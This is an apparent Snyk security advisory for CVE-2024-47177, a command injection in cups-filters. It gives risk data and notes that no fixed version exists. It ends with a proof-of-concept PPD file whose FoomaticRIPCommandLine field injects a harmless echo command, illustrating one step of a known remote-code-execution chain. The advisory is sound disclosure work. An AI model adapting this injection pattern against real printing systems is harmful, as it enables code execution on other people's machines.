Command Injection Affecting distrotech/cups-filters package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (12th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-UNMANAGED-DISTROTECHCUPSFILTERS-8102333
- published 27 Sep 2024
- disclosed 26 Sep 2024
- credit Simone Margaritelli
Introduced: 26 Sep 2024
CVE-2024-47177 Open this link in a new tabHow to fix?
There is no fixed version for distrotech/cups-filters.
Overview
Affected versions of this package are vulnerable to Command Injection via the FoomaticRIPCommandLine entry in the PPD file. An attacker can execute arbitrary commands on the system by injecting malicious commands into this parameter when a print job is processed.
Note: This vulnerability is being investigated and the advisory is being updated as new information is discovered.
PoC
This bug is part of an exploit chain leading to RCE described here.
*PPD-Adobe: "4.3"
*FormatVersion: "4.3"
*FileVersion: "2.0.0"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
*PSVersion: "(3010.000) 0"
...
...
*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "echo 1 > /tmp/VULNERABLE"
...
...
*DefaultResolution: 300dpi`